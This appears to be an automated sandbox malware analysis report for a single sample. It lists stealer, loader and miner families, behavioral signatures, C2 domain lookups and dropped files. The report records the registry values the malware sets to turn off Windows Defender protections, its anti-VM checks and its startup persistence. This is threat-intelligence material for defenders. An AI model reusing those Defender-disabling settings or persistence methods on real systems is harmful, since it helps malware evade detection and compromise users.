Malware Analysis Report

2025-04-03 09:24

Sample ID 250306-fd2rlazjx7
Target 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d
SHA256 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d
Tags
defense_evasion discovery spyware stealer amadey healer stealc systembc vidar xmrig 092155 ir7am traff1 credential_access dropper evasion execution miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d

Threat Level: Known bad

The file 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery spyware stealer amadey healer stealc systembc vidar xmrig 092155 ir7am traff1 credential_access dropper evasion execution miner persistence trojan

Stealc family

Detect Vidar Stealer

SystemBC

Vidar

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender Real-time Protection settings

xmrig

Vidar family

Detects Healer an antivirus disabler dropper

Systembc family

Amadey

Healer family

Modifies Windows Defender TamperProtection settings

Stealc

Healer

Xmrig family

Modifies Windows Defender notification settings

Amadey family

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Blocklisted process makes network request

Drops startup file

Reads user/profile data of local email clients

Identifies Wine through registry keys

Reads user/profile data of web browsers

.NET Reactor proctector

Checks computer location settings

Executes dropped EXE

Reads data files stored by FTP clients

Windows security modification

Checks BIOS information in registry

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of UnmapMainImage

Modifies registry class

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 04:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 04:46

Reported

2025-03-06 04:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe

"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 1240

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp

Files

memory/2512-0-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-1-0x0000000077280000-0x0000000077282000-memory.dmp

memory/2512-2-0x0000000001171000-0x00000000011D1000-memory.dmp

memory/2512-3-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-4-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-5-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-7-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-8-0x0000000001171000-0x00000000011D1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 04:46

Reported

2025-03-06 04:48

Platform

win10v2004-20250217-en

Max time kernel

144s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rvhetm\ktgtc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rvhetm\ktgtc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rvhetm\ktgtc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
